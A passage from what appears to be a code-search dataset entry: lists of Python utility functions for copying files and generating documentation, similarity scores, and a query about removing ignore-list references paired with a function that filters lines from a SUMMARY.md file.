shutil.copy2(src=item, dst=os.path.join(config.TOC_OCR_IN, doc_dict['name']))\n except:\n\n # raise exception if error occurs during copying\n raise IOError(f\"{format(datetime.now(), '%Y-%m-%d %H:%M:%S')} ERROR (OCR): Failed to copy {item} to {os.path.join(config.TOC_OCR_IN, doc_dict['name'])}...\")", "def write_api_docs(self, outdir):\r\n if not os.path.exists(outdir):\r\n os.mkdir(outdir)\r\n # compose list of modules\r\n modules = self.discover_modules()\r\n self.write_modules_api(modules,outdir)", "def copy():\n put(os.path.join('dist', get_egg_name()), remote_egg_dir)", "def __copyFiles(self):\n if os.path.isdir(self.__sourcePath):\n shutil.copytree(self.__sourcePath, self.__targetPath)\n else:\n shutil.copy2(self.__sourcePath, self.__targetPath)", "def makeDocFile(self):\n\n f_out = \"%s/%s-doc.php\" % (self.dir_out, self.project_id)\n version = max(self.versions)\n\n with open(f_out, 'w') as f:\n f.write(\"<!DOCTYPE html>\\n\" \\\n \"<html xmlns=\\\"http://www.w3.org/1999/xhtml\\\">\\n\" \\\n \"<head>\\n\" \\\n \"<meta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\"/>\\n\" \\\n \"\\n\" \\\n \"<title>Kit&Pack − Ultimate Power Booster</title>\\n\" \\\n \"<link rel=\\\"shortcut icon\\\" type=\\\"image/png\\\" href=\\\"../favicon.png\\\"/>\" \\\n \"<link rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"../css/doc-2.css\\\" />\\n\"\n \"\\n\" \\\n \"</head>\\n\" \\\n \"<body>\\n\" \\\n \"\\n\" \\\n \"<h1>Ultimate Power Booster</h1>\" \\\n \"\\n\")\n\n # Write a list of other versions of the documentation\n f.write(\"<p>Versions de cette documentation.</p>\\n\")\n f.write(\"<ul>\\n\")\n for v in self.versions:\n f.write(\"\\t<li><a href=\\\"%s.php\\\">%s</a></li>\\n\" % (\n v, v))\n f.write(\"</ul>\\n\\n\")\n\n f.write(\"<?php\\n\" \\\n \"include(\\\"%s.php\\\")\\n\" \\\n \"?>\\n\" \\\n \"\\n\" \\\n \"</body>\\n\" \\\n \"</html>\" % (version))", "def copy_dir(dirf,dir2,fromapp,toapp):\n import glob\n fls=glob.glob(dirf+\"/*.F90\")\n for f in fls:\n nf=f.replace(fromapp,toapp)\n copy_file(f,nf,fromapp,toapp)\n #copy the cmake file\n fromf=dirf+'/CMakeLists.txt'\n tof=dir2+'/CMakeLists.txt'\n copy_file(fromf,tof,fromapp,toapp)", "def copy_static(root_directory, dist_directory, sdk_directory):\n\n for static in configuration.STATICS:\n context = {\n \"root\": root_directory,\n \"sdk\": sdk_directory,\n \"dist\": dist_directory\n }\n\n source = templates.from_string(static[\"source\"], context)\n target = templates.from_string(static[\"target\"], context)\n target = os.path.join(dist_directory, target)\n\n # Perform the action.\n sys.stdout.write(\"Copying '%s'\\n\" % source)\n\n if static[\"type\"] == \"directory\":\n recursive_overwrite(source, target)\n else:\n shutil.copy(source, target)", "def _generate_custom(project, docdir, gendir):\n custom_dir = os.path.join(docdir, 'generate')\n print(f\"Generating custom docs for {project} in {gendir!r}\")\n\n for root, _dirs, files in os.walk(custom_dir):\n subdir = root.split(custom_dir, 1)[1].strip('/')\n if subdir:\n try:\n os.mkdir(os.path.join(gendir, subdir))\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n\n for script in sorted(x for x in files if not x.startswith(('.', '_'))):\n script_path = os.path.join(custom_dir, subdir, script)\n if not os.access(script_path, os.X_OK):\n continue\n\n fake_file = StringIO()\n with syspath(os.path.dirname(script_path)):\n module = import_module(os.path.basename(os.path.splitext(script_path)[0]))\n module.main(fake_file, docdir=docdir, gendir=gendir)\n\n 
fake_file.seek(0)\n if data := fake_file.read():\n rst = os.path.join(gendir, subdir, os.path.splitext(script)[0] + '.rst')\n print(f\"generating {rst}\")\n with open(rst, 'w') as f:\n f.write(data)", "def copy_support_files() -> None:\n # root folder files\n filelist = {\"favicon128.png\",\n \"favicon96.png\",\n \"favicon72.png\",\n \"favicon48.png\",\n \"favicon32.png\",\n \"favicon24.png\",\n \"favicon16.png\",\n \"favicon.ico\",\n \"apple-touch-icon.png\",\n \"apple-touch-icon-precomposed.png\",\n \"apple-touch-icon-72x72.png\",\n \"apple-touch-icon-72x72-precomposed.png\",\n \"apple-touch-icon-114x114.png\",\n \"apple-touch-icon-114x114-precomposed.png\",\n \"apple-touch-icon-144x144.png\",\n \"apple-touch-icon-144x144-precomposed.png\",\n \"uca_style.css\"}\n for filename in filelist:\n try:\n shutil.copy2(\"resources/\" + filename, WEBOUT_PATH)\n except FileNotFoundError:\n report_error(\"Missing file: resources/\" + filename)\n # image folder files\n filelist = {\"film.png\",\n \"stylifera75.png\",\n \"DOI_logo.svg\",\n \"size_hist.png\",\n \"size_ind.png\",\n \"size_mean.png\",\n \"size_range.png\",\n \"size_summary.png\",\n \"double_clawed.jpg\"}\n for filename in filelist:\n try:\n shutil.copy2(\"resources/images/\" + filename, WEBOUT_PATH + \"images/\")\n except FileNotFoundError:\n report_error(\"Missing file: resources/images/\" + filename)\n filelist = {\"specific_word_cloud.png\",\n \"binomial_word_cloud.png\"}\n for filename in filelist:\n try:\n shutil.copy2(TMP_PATH + filename, WEBOUT_PATH + \"images/\")\n except FileNotFoundError:\n report_error(\"Missing file: \" + TMP_PATH + filename)\n # font-awesome files\n filelist = {\"fontawesome.min.js\",\n \"brands.min.js\",\n \"regular.min.js\",\n \"solid.min.js\"}\n for filename in filelist:\n try:\n shutil.copy2(\"resources/font-awesome/js/\" + filename, WEBOUT_PATH + \"js/\")\n except FileNotFoundError:\n report_error(\"Missing file: resources/font-awesome/js/\" + TMP_PATH + filename)\n # flag-icon files\n filelist = {\"flag-icons.min.css\"}\n for filename in filelist:\n try:\n shutil.copy2(\"resources/flag-icon-css/css/\" + filename, WEBOUT_PATH + \"images/flag-icon-css/css/\")\n except FileNotFoundError:\n report_error(\"Missing file: images/flag-icon-css/css/\" + TMP_PATH + filename)\n filelist = {\"de.svg\", # Germany\n \"es.svg\", # Spain\n \"ru.svg\", # Russia\n \"fr.svg\", # France\n \"pt.svg\", # Portugal\n \"dk.svg\", # Denmark\n \"nl.svg\", # Netherlands\n \"jp.svg\", # Japan\n \"cn.svg\", # China\n \"us.svg\", # USA\n \"th.svg\", # Thailand\n \"va.svg\", # Vatican\n \"it.svg\", # Italy\n \"kr.svg\", # South Korea\n \"pl.svg\", # Poland\n \"mm.svg\", # Myanamar (Burma)\n \"sa.svg\", # Saudi Arabia (best option for Arabic of those available)\n \"id.svg\", # Indonesia\n \"za.svg\", # South Africa (best option for Afrikaans)\n \"my.svg\", # Malaysia (for Malay)\n \"mg.svg\", # Madagascar (for Malagasy)\n \"ir.svg\", # Iran (for Persian)\n \"vn.svg\"} # Vietnam\n for filename in filelist:\n try:\n shutil.copy2(\"resources/flag-icon-css/flags/4x3/\" + filename, WEBOUT_PATH +\n \"images/flag-icon-css/flags/4x3/\")\n except FileNotFoundError:\n report_error(\"Missing file: images/flag-icon-css/flags/4x3/\" + TMP_PATH + filename)", "def pull(dirs = ['map','table', 'trigger', 'w3x2lni'], release='release/', development='development/'):\n\n if not os.path.exists(development):\n os.mkdir(development)\n\n if not os.path.exists(os.path.join(development, '.w3x')):\n shutil.copy(os.path.join(release, '.w3x'), 
os.path.join(development, '.w3x'))\n\n for directory in dirs:\n if os.path.exists(development+directory):\n shutil.rmtree(development+directory)\n shutil.copytree(release+directory,development+directory)", "def docs(session):\n session.install('-rrequirements-dev.txt')\n session.install('-e', '.')\n run_sphinx(session)", "def _clone_defaults(self, source, dest, context):\n\n for base, dirs, files in os.walk(source):\n relative = os.path.relpath(base, source)\n\n for d in dirs:\n os.makedirs(os.path.join(dest, relative, d))\n\n for filename in files:\n\n if not filename.endswith(self.valid_extensions):\n continue\n\n with open(os.path.join(base, filename), 'r') as f:\n data = f.read()\n\n with open(os.path.join(dest, relative, filename), 'w') as f:\n data = jinja2.Template(data).render(**context)\n f.write(data)", "def docsave(self):\n\n filename = filedialog.askdirectory(initialdir=self.root.cache_dir,\n title='Select Folder')\n self.save_entry_doc.clear()\n self.save_entry_doc.insert(tk.END, filename)\n self.root.cache_dir = filename", "def from_dir_changed(self):\n text = self.from_dir.toPlainText().strip()\n if os.path.exists(text):\n sqlite.w('update settings set source_path = (?) where id is 1', text)\n all_files = self.get_all_files_from_path(text, extension='PDF')\n self.pdf_files = self.make_all_files_dictionary(all_files)\n\n if not self.pdf_files:\n return\n\n self.reset_widgets(all=True)\n self.draw_pdf_files()", "def _docdir(request):\n\n # Trigger ONLY for the doctests.\n if isinstance(request.node, DoctestItem):\n\n # Get the fixture dynamically by its name.\n tmpdir = request.getfixturevalue('tmpdir')\n\n # Chdir only for the duration of the test.\n olddir = os.getcwd()\n tmpdir.chdir()\n yield\n os.chdir(olddir)\n\n else:\n # For normal tests, we have to yield, since this is a yield-fixture.\n yield", "def create_directory(resources_dir):\n for f in os.listdir(os.path.join(resources_dir, \"docs_for_ner\")):\n fpath = os.path.join(resources_dir, \"docs_for_ner\", f)\n if os.path.isfile(fpath):\n os.unlink(fpath)", "def temp_article_dir(temp_cwd: Path) -> Path:\n article_source_dir = Path(__file__).parent / \"data\" / \"article\"\n for source_path in article_source_dir.iterdir():\n relative_path = source_path.relative_to(article_source_dir)\n dest_path = Path.cwd().joinpath(relative_path)\n if source_path.is_dir():\n shutil.copytree(source_path, dest_path)\n else:\n shutil.copy(source_path, dest_path)\n\n return temp_cwd", "def main():\n # We know that qidoc build will set the correct cwd\n qibuild_dir = \"..\"\n qibuild_dir = os.path.abspath(qibuild_dir)\n this_file = __file__\n this_dir = os.path.dirname(this_file)\n cmake_api = os.path.join(this_dir, \"../source/advanced/cmake/api\")\n cmake_api = os.path.abspath(cmake_api)\n if not os.path.exists(cmake_api):\n os.makedirs(cmake_api)\n qibuild_cmake = os.path.join(qibuild_dir, \"cmake\", \"qibuild\")\n for filename in DOCUMENTED_FILES:\n cmake_file = os.path.join(qibuild_cmake, filename + \".cmake\")\n rst_file = os.path.join(cmake_api, filename + \".rst\")\n gen_cmake_doc(cmake_file, rst_file)", "def process(self, source, dest):\n\n if os.path.isfile(dest):\n print(\"File %s exists -> aborting\" % dest)\n exit(1)\n print(dest)\n \n fin = open(source)\n fout = open(dest, 'w')\n for l in fin.readlines():\n l = l.replace(\"AUTHOR\", self.author)\n l = l.replace(\"DESCRIPTION\", self.description)\n l = l.replace(\"NAMESPACE\", self.namespace)\n l = l.replace(\"MyComponent\", self.className)\n l = l.replace(\"INCDIR\", 
self.hDir)\n l = l.replace(\"CXXDIR\", self.cxxDir)\n l = l.replace(\"YEAR\", str(self.now.year))\n l = l.replace(\"DATE\", \"%d %s %d\" % (self.now.day, self.now.strftime(\"%b\"), self.now.year))\n fout.write(l)\n fout.close()\n fin.close()", "def copyDir(src, dst, includes, excludes = []):\n\tmultiFilesReplacements([], dst, src, includes, excludes)", "def basic_list_duo(source_dir):\n return source_file_contents(source_dir, \"basic_list_duo.md\")", "def finalize_options(self):\n self.build_dir = os.path.join(*DOC_BUILD_DIR.split(os.sep)[:-1])\n BuildDoc.finalize_options(self)", "def generate_docs(self) -> List[Path]:\n outputs = []\n for file in self.files:\n if (stem := file.stem) == \"__init__\":\n # We might have more than one __init__.py file depending on package structure and these files shouldn't\n # contain methods, so we don't want to convert them\n continue\n\n if not (doc := get_doc(file)):\n continue # No docstring returned, skip this file\n doc = doc[33:] # First 33 characters are not required for our docs\n\n # Write the output we've generated to a file\n (output := self.directory / f\"{stem}.md\").write_text(generate_header(stem) + doc)\n outputs.append(output)\n return outputs", "def copy(self, src, dest):\n\n src = os.path.join(os.path.dirname(__file__), \"collections\", \"kitchensink\", src)\n dest = os.path.join(self.checkout, dest)\n if os.path.isdir(src):\n shutil.copytree(src, dest)\n else:\n shutil.copy(src, dest)\n return dest", "def link_origin_doc(link_source, links, redistribution='none', zip_file=None):\n ldoc = link_doc(link_source, 'origin', links)\n ldoc['redistribution'] = redistribution\n if zip_file:\n ldoc['zip_file'] = zip_file\n return ldoc", "def archives_doc(ctx: click.Context, sources: Set[Path], state: State) -> None:\n modules = {\n file.parts[-1]: parse_module(str(file.absolute())).serialize()\n for file in sources\n }\n\n out(modules)\n ctx.exit(0)", "def _get_doc_files(self):\n return [(path.join(self.DocDirectory, 'conf.py'), 'Python')]", "def collect_source_hpp_files(self):\n for pattern in self.package_info.source_hpp_patterns:\n for filename in fnmatch.filter(self.source_hpp_files, pattern):\n self.package_info.source_hpp_files.append(os.path.basename(filename))\n self.source_dirs.add(os.path.abspath(os.path.dirname(filename)))\n\n for root, _, filenames in os.walk(self.source_root, followlinks=True):\n for pattern in self.package_info.source_hpp_patterns:\n for filename in fnmatch.filter(filenames, pattern):\n if \"pybindx\" not in filename:\n self.package_info.source_hpp_files.append(os.path.join(root, filename))\n self.package_info.source_hpp_files = [path for path in self.package_info.source_hpp_files\n if self.wrapper_root not in path]", "def createFakeSphinxProject(self):\n self.sourceDir.child(\"conf.py\").setContent(self.confContent.encode())\n self.sourceDir.child(\"index.rst\").setContent(self.indexContent.encode())", "def docs_build(directory, site_name, view=True, assume_yes=False):\n context = toolkit.load_data_context_with_error_handling(directory)\n build_docs(context, site_name=site_name, view=view, assume_yes=assume_yes)\n toolkit.send_usage_message(\n data_context=context, event=\"cli.docs.build\", success=True\n )", "def makedocs(projectfolder):\n featuremodel_path = path.join(projectfolder, \"productline\", \"model.xml\")\n configs_path = path.join(projectfolder, \"productline\", \"configs\")\n bddfeatures_path = path.join(projectfolder, \"bddfeatures\")\n testreports_path = path.join(projectfolder, \"testreports\")\n\n 
fmparser = parsers.FeatureModelParser()\n resultsparser = parsers.TestResultsParser()\n feature_tree_renderer = ftrenderer.FeatureTreeRenderer()\n\n docs_dir = path.join(projectfolder, \"docs/generated\")\n if path.exists(docs_dir):\n shutil.rmtree(docs_dir)\n makedirs(docs_dir)\n\n lektor_templates_path = \"doc_templates\"\n utilities.sed_inplace(\n path.join(lektor_templates_path, \"aplet.lektorproject\"),\n r'<<PROJECT>>',\n CONFIG[\"project_name\"])\n\n products = {}\n product_names = get_product_names_from_configs_path(configs_path)\n for product_name in product_names:\n productconfig_filepath = path.join(projectfolder, \"productline/configs\", product_name + \".config\")\n product_html_report_name = \"report{0}.html\".format(product_name)\n product_html_results_src = path.join(testreports_path, product_html_report_name)\n product_xml_report_name = \"report{0}.xml\".format(product_name)\n product_xml_results_src = path.join(testreports_path, product_xml_report_name)\n\n with open(productconfig_filepath, \"r\") as productconfig_file:\n products[product_name] = {}\n products[product_name]['features'] = [feature.strip() for feature in productconfig_file.readlines()]\n\n current_product_lektor_dir = path.join(lektor_templates_path, \"content/products\", product_name)\n if not path.exists(current_product_lektor_dir):\n makedirs(current_product_lektor_dir)\n\n product_filepath = path.join(current_product_lektor_dir,\"contents.lr\")\n shutil.copyfile(path.join(lektor_templates_path, \"helpers/product_contents.lr\"), product_filepath)\n\n feature_model = fmparser.parse_from_file(featuremodel_path)\n gherkin_pieces = ftrenderer.gherkin_pieces_grouped_by_featurename(bddfeatures_path)\n gherkin_piece_test_statuses = resultsparser.get_gherkin_piece_test_statuses_for_product_from_file(product_xml_results_src)\n configparser = parsers.ProductConfigParser(feature_model.root_feature.name)\n product_features = configparser.parse_config(productconfig_filepath)\n feature_model.trim_based_on_config(product_features)\n feature_model.add_gherkin_pieces(gherkin_pieces)\n feature_model.calculate_test_statuses(gherkin_piece_test_statuses)\n\n feature_tree_renderer.build_graphviz_graph(feature_model.root_feature)\n feature_tree_renderer.render_as_svg(current_product_lektor_dir, \"feature_model\")\n\n utilities.sed_inplace(product_filepath, r'<<PRODUCT>>', product_name)\n product_test_status = feature_model.root_feature.test_status\n utilities.sed_inplace(product_filepath, \"<<TEST_STATUS>>\", product_test_status.name)\n\n # Copy test run html report to generated docs\n if path.exists(product_html_results_src):\n shutil.copyfile(product_html_results_src, path.join(current_product_lektor_dir, product_html_report_name))\n\n click.echo(\"- Generating feature model SVG...\")\n click.echo(featuremodel_path)\n\n feature_model = fmparser.parse_from_file(featuremodel_path)\n gherkin_pieces = ftrenderer.gherkin_pieces_grouped_by_featurename(bddfeatures_path)\n gherkin_piece_test_statuses = resultsparser.get_gherkin_piece_test_statuses_for_dir(testreports_path)\n feature_model.add_gherkin_pieces(gherkin_pieces)\n feature_model.calculate_test_statuses(gherkin_piece_test_statuses)\n\n feature_tree_renderer.build_graphviz_graph(feature_model.root_feature)\n feature_tree_renderer.render_as_svg(path.join(lektor_templates_path, \"content/\"), \"feature_model\")\n\n click.echo(\"- Building site\")\n lektor_cmd = [\"lektor\", \"--project\", lektor_templates_path, \"build\", \"-O\", path.abspath(docs_dir)]\n click.echo(\"Running: 
\" + subprocess.list2cmdline(lektor_cmd))\n subprocess.call(lektor_cmd)\n\n product_map_renderer = mapbuilder.ProductMapRenderer()\n productline_generated_filepath = path.join(docs_dir, \"index.html\")\n html = product_map_renderer.get_productmap_html(feature_model, products)\n utilities.sed_inplace(productline_generated_filepath, r'<<PRODUCTMAP>>', html)", "def beehive_make_doc(self):\n run_data = {\n u'tags':[u'doc'],\n u'local_package_path':self.local_package_path\n } \n self.ansible_playbook(u'docs', run_data, \n playbook=self.beehive_doc_playbook)", "def set_save_directory(base, source):\r\n root = os.path.join(base, source)\r\n if not os.path.isdir(root):\r\n os.makedirs(root)\r\n\r\n world.screenshot_root = root", "def opendocs():\n _open_file('_build/index.html')", "def clean(self):\n if os.path.exists(self.paths['build_dir']):\n shutil.rmtree(self.paths['build_dir'])\n if os.path.exists(os.path.join(self.base_dir, 'docs')):\n shutil.rmtree(os.path.join(self.base_dir, 'docs'))", "def bib_minimal(tmpdir) -> str:\n src = resource_filename(\"tests\", \"libs/minimal.bib\")\n dst = str(tmpdir.join(\"tmp.bib\"))\n\n # Copy the file to the temporary directory and return the path\n copyfile(src, dst)\n return dst", "def main(input):\n path = os.path.abspath(input)\n name = os.path.splitext(os.path.basename(path))[0]\n p = os.path.join(os.getcwd(),name)\n i = 1\n p1 = p\n while os.path.exists(p1):\n p1 = \"{p}-{i}\".format(p=p,i=i)\n i += 1\n p = p1\n os.mkdir(p1)\n os.mkdir(os.path.join(p1,\"media\"))\n with zipfile.ZipFile(path) as zf:\n for file in zf.namelist():\n # Path traversal defense copied from\n # http://hg.python.org/cpython/file/tip/Lib/http/server.py#l789\n words = file.split('/')\n dest = os.path.join(p1, \"media\")\n if words[0] == \"word\" and words[1] == \"media\":\n for word in words[2:]:\n while True:\n drive, word = os.path.splitdrive(word)\n head, word = os.path.split(word)\n if not drive:\n break\n if word in (os.curdir, os.pardir, ''):\n continue\n dest = os.path.join(dest, word)\n click.echo(\"{} -> {}\".format(file, dest))\n of = open(dest, 'wb')\n of.write(zf.read(file))\n of.close()\n\n newdoc = os.path.join(p1, os.path.basename(path))\n lyxfile = os.path.join(p1, name + \".lyx\")\n texfile = os.path.join(p1, name + \".tex\")\n shutil.copyfile(path, newdoc)\n os.system(\"pandoc -s -f docx -t latex -o '{of}' '{i}'\".format(of=texfile, i=newdoc))\n os.system(\"tex2lyx '{i}' '{o}'\".format(i=texfile, o=lyxfile))\n os.remove(texfile)\n os.system(\"convertwmf {dir}\".format(dir=os.path.join(p1, \"media\")))\n click.echo(lyxfile)", "def copy_source_files(self):\n\n LOGGER.info(f'start copying source files')\n count = 0\n for sfp in tqdm(sorted(self.source_fps), disable=self.disable_tqdm):\n try:\n meta = extract_law_meta(sfp)\n nodes = parse_xml_fp(sfp)\n tfp = self.stot(sfp)\n tfp.parent.mkdir(parents=True, exist_ok=True)\n save_law_tree(meta['LawTitle'], nodes, tfp)\n except Exception as e:\n LOGGER.error(f'failed to copy {sfp}: {e}')\n continue\n self.target_fps.add(tfp)\n LOGGER.debug(f'copied {sfp} to {tfp}')\n count += 1\n LOGGER.info(f'copied total {count} source files, now total {len(self.target_fps)} target files exist')", "def install(self):\n if self.__checkDestination():\n if self.__ui:\n self.__ui.progressText.append('Destination found, removing it...')\n self.__removeFiles(self.__targetPath, verbose=True)\n if self.__ui:\n self.__ui.progressText.append('Copying files...')\n self.__copyFiles()\n if self.__ui:\n self.__ui.progressText.append('Runnign 
checks...')\n if not self.__runChecks():\n raise InstallationError(\"The installation has fail, it did not pass one of the checks\")\n\n # Clean the tmp folder by removing the source\n self.__removeFiles(self.__sourcePath)", "def copy_dir(source, dest, vars, verbosity=1, simulate=False, indent=0,\n sub_vars=True, interactive=False, overwrite=True,\n template_renderer=None, out_=sys.stdout):\n def out(msg):\n out_.write(msg)\n out_.write('\\n')\n out_.flush()\n # This allows you to use a leading +dot+ in filenames which would\n # otherwise be skipped because leading dots make the file hidden:\n vars.setdefault('dot', '.')\n vars.setdefault('plus', '+')\n use_pkg_resources = isinstance(source, tuple)\n if use_pkg_resources:\n names = sorted(pkg_resources.resource_listdir(source[0], source[1]))\n else:\n names = sorted(os.listdir(source))\n pad = ' '*(indent*2)\n if not os.path.exists(dest):\n if verbosity >= 1:\n out('%sCreating %s/' % (pad, dest))\n if not simulate:\n makedirs(dest, verbosity=verbosity, pad=pad)\n elif verbosity >= 2:\n out('%sDirectory %s exists' % (pad, dest))\n for name in names:\n if use_pkg_resources:\n full = '/'.join([source[1], name])\n else:\n full = os.path.join(source, name)\n reason = should_skip_file(name)\n if reason:\n if verbosity >= 2:\n reason = pad + reason % {'filename': full}\n out(reason)\n continue # pragma: no cover\n if sub_vars:\n dest_full = os.path.join(dest, substitute_filename(name, vars))\n sub_file = False\n if dest_full.endswith('_tmpl'):\n dest_full = dest_full[:-5]\n sub_file = sub_vars\n if use_pkg_resources and pkg_resources.resource_isdir(source[0], full):\n if verbosity:\n out('%sRecursing into %s' % (pad, os.path.basename(full)))\n copy_dir((source[0], full), dest_full, vars, verbosity, simulate,\n indent=indent+1,\n sub_vars=sub_vars, interactive=interactive,\n template_renderer=template_renderer, out_=out_)\n continue\n elif not use_pkg_resources and os.path.isdir(full):\n if verbosity:\n out('%sRecursing into %s' % (pad, os.path.basename(full)))\n copy_dir(full, dest_full, vars, verbosity, simulate,\n indent=indent+1,\n sub_vars=sub_vars, interactive=interactive,\n template_renderer=template_renderer, out_=out_)\n continue\n elif use_pkg_resources:\n content = pkg_resources.resource_string(source[0], full)\n else:\n f = open(full, 'rb')\n content = f.read()\n f.close()\n if sub_file:\n try:\n content = substitute_content(\n content, vars, filename=full,\n template_renderer=template_renderer\n )\n except SkipTemplate:\n continue # pragma: no cover\n if content is None:\n continue # pragma: no cover\n already_exists = os.path.exists(dest_full)\n if already_exists:\n f = open(dest_full, 'rb')\n old_content = f.read()\n f.close()\n if old_content == content:\n if verbosity:\n out('%s%s already exists (same content)' %\n (pad, dest_full))\n continue # pragma: no cover\n if interactive:\n if not query_interactive(\n native_(full, fsenc), native_(dest_full, fsenc),\n native_(content, fsenc), native_(old_content, fsenc),\n simulate=simulate, out_=out_):\n continue\n elif not overwrite:\n continue # pragma: no cover\n if verbosity and use_pkg_resources:\n out('%sCopying %s to %s' % (pad, full, dest_full))\n elif verbosity:\n out(\n '%sCopying %s to %s' % (pad, os.path.basename(full),\n dest_full))\n if not simulate:\n f = open(dest_full, 'wb')\n f.write(content)\n f.close()", "def fetch_sample_templates():\n source_folder = Path(root, 'templates', 'sample_setup_files')\n Path('sample_templates').mkdir(parents=True, exist_ok=True)\n 
target_folder = Path().resolve()\n target_folder = Path(target_folder, 'sample_templates')\n\n copytree(source_folder, target_folder, dirs_exist_ok=True)\n logger.info(f'Sample templates can be found in directory {target_folder}')" ]
[ "0.71197486", "0.64806306", "0.61687136", "0.6106528", "0.6040729", "0.599639", "0.59881204", "0.59192413", "0.5918901", "0.5830127", "0.5795234", "0.57863706", "0.5776979", "0.57418394", "0.57132345", "0.5694525", "0.5685527", "0.5615512", "0.5591277", "0.5551153", "0.55445683", "0.5515156", "0.5491799", "0.5465701", "0.5438618", "0.5434961", "0.5416356", "0.5407375", "0.5406556", "0.53710455", "0.5356547", "0.53496766", "0.5346021", "0.53440166", "0.5296017", "0.5277491", "0.526867", "0.5242279", "0.5240818", "0.52367914", "0.52213675", "0.5215917", "0.5212194", "0.52109337", "0.5190141", "0.5126023", "0.5125817", "0.5098223", "0.5080392", "0.5072271", "0.5070331", "0.5054807", "0.50507647", "0.5048944", "0.5043583", "0.50409925", "0.50222486", "0.5019646", "0.50177246", "0.5017504", "0.5016311", "0.50163", "0.5010621", "0.5007585", "0.5001586", "0.4983763", "0.49799916", "0.49705622", "0.4969964", "0.49668264", "0.49629387", "0.4955821", "0.49553302", "0.49514562", "0.49504548", "0.49420136", "0.49382907", "0.49351594", "0.4929646", "0.4926684", "0.49248776", "0.49238023", "0.4922754", "0.4914157", "0.4906165", "0.4903975", "0.49022302", "0.48997435", "0.48839262", "0.48795855", "0.48659164", "0.48599696", "0.48534092", "0.48510876", "0.4844818", "0.48371145", "0.48338884", "0.48305914", "0.48298594", "0.48295492", "0.4817259" ]
0.0
-1
Remove references to elements in the ignore list.
def edit_summary(): with open("docs/SUMMARY.md", "r") as opened_file: summary = opened_file.readlines() with open("docs/SUMMARY.md", "w") as opened_file: for line in summary: if not any(ext in line for ext in ignore_list): opened_file.write(line)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_ignore_list(book_list):\n my_ignore_list = ['a','able','about','across','after','all','almost','also',\n 'am','an','and','any','are','as','at','be','because',\n 'been','but','by','can','cannot','could','did','do','does',\n 'for','from','get','got','had','has','have','he','her','hers',\n 'him','his','how','however','i','if','in','into','is']\n\n book_list = filter(lambda book_list: book_list not in my_ignore_list, book_list)\n\n return book_list", "def _remove_all_matches(values, needle):\n values[:] = (i for i in values if i != needle)", "def _clean_ignored(self, tokens):\n return list(filter(lambda t : t.token_value not in self._ignored, tokens))", "def remove(self, items, relative=True):\n if relative: items = self.items[items]\n self.items = np.setdiff1d(self.items, items)", "def rm(x, l):\n return [y for y in l if x != y]", "def remove_all(self, item):\n # type: (Any) -> None\n item = self.ref(item)\n while list.__contains__(self, item):\n list.remove(self, item)", "def remove_elements(l, e):\n return [x for x in l if x != e]", "def removeAll(self, *args):\n pass", "def exclude_list(self):\n pass", "def clean_up_dict(clean_dict, ignore_list):\n for i in ignore_list:\n clean_dict.pop(i, None)\n return clean_dict", "def prune_unlinked(self):\n linked_ids = set()\n for (link_from, link_to, link_style, link_tail) in self.links:\n linked_ids.add(link_from)\n linked_ids.add(link_to)\n nodes_to_delete = []\n for name, node in self.nodes.items():\n if node.node_id not in linked_ids:\n nodes_to_delete.append(name)\n for name in nodes_to_delete:\n del self.nodes[name]", "def test_prune_ignore_list(self, ignore_list, expected_ignored_dirs,\n expected_ignored_files):\n all_dirs = []\n all_files = []\n\n for path in self.paths:\n rel_dir_root = path[\"root\"]\n dirs = path[\"dirs\"]\n files = path[\"files\"]\n self.file_scanner._prune(\n rel_dir_root, dirs, files, ignore_list=ignore_list)\n all_dirs.extend(dirs)\n all_files.extend(files)\n\n [self.assertNotIn(d, all_dirs) for d in expected_ignored_dirs]\n [self.assertNotIn(f, all_files) for f in expected_ignored_files]", "def ignore(self, receptors_to_ignore: list[str] | list[None]) -> None:\n self._assert_receptor_input_is_valid(receptors_to_ignore)\n self._ignore = [\n r for r in self.observer.photoreceptors if r in receptors_to_ignore\n ]", "def _remove_redundant_signals(self, signals: List[Signal]):\n open_positions = self._broker.get_positions()\n tickers_with_open_positions = set(\n self._contract_to_ticker(position.contract()) for position in open_positions\n )\n\n signals_with_suggested_exposure_out = [signal for signal in signals if\n signal.suggested_exposure == Exposure.OUT]\n redundant_signals = [signal for signal in signals_with_suggested_exposure_out\n if signal.ticker not in tickers_with_open_positions]\n\n for signal in redundant_signals:\n signals.remove(signal)", "def remove_pathways(self, pathways: list):\n # only filter the gene_set object\n for pathway_id in pathways:\n self.gene_sets.pop(pathway_id, None)\n self.gene_set_names.pop(pathway_id, None)\n self.gene_set_size.pop(pathway_id, None)\n self.n_curated.pop(pathway_id, None)\n self.n_interactors.pop(pathway_id, None)\n if len(self.interactors) > 0:\n self.interactors.pop(pathway_id, None)", "def ignores(self):\n pass # make ignore_tags unaccessible", "def ignored_lists(self) -> List[str]:\n return self.__lists_to_ignore", "def drop_mark(self, mark):\n if type(mark) is list:\n for m in mark:\n self.drop_mark(m)\n return\n to_prune = []\n for sample, _mark in 
self['marks'].items():\n if mark==_mark:\n to_prune.append(sample)\n\n self.drop_library(to_prune)", "def clear_includepatterns(self):\n self._excludepatterns = []", "def clear_excludepatterns(self):\n self._excludepatterns = []", "def eraseAll(self): # remove all robots\n\t\tself.__robotList = []", "def dedupe(self):\n elems = []\n for x in self.elems:\n if x not in elems:\n elems.append(x)\n return _coconut_tail_call(self.__class__, *elems)", "def remove_all(self, *items):\n for item in items:\n self.remove(item)", "def remove_all(el, lst):\n for _ in lst:\n lst.remove(el)", "def remove_false_positives(headlines,exclusions):\r\n for headline in headlines:\r\n for word in exclusions:\r\n if headline.lower().find(word) != -1: #If headline contains exclusionary word.\r\n headlines.remove(headline)\r\n break\r\n return headlines", "def remove_refs(self):\n\n self.reference = None\n self.url = None", "def _removeUnusedElements(self, element):\n self.log(\"element:%r\" % element)\n for pad in element.src_pads():\n if pad.is_linked():\n peer = pad.get_peer().get_parent()\n self._removeUnusedElements(peer)\n if not peer in self._validelements:\n self.log(\"removing %s\" % peer.get_name())\n pad.unlink(pad.get_peer())\n peer.set_state(gst.STATE_NULL)\n self.remove(peer)", "def exclude(self, *args, **kwargs):", "def _remove_gitignore_files(self, log_prompt: str) -> None:\n try:\n repo = git.Repo(self._content_repo)\n files_to_ignore = repo.ignored(self._facts[\"lint_files\"])\n for file in 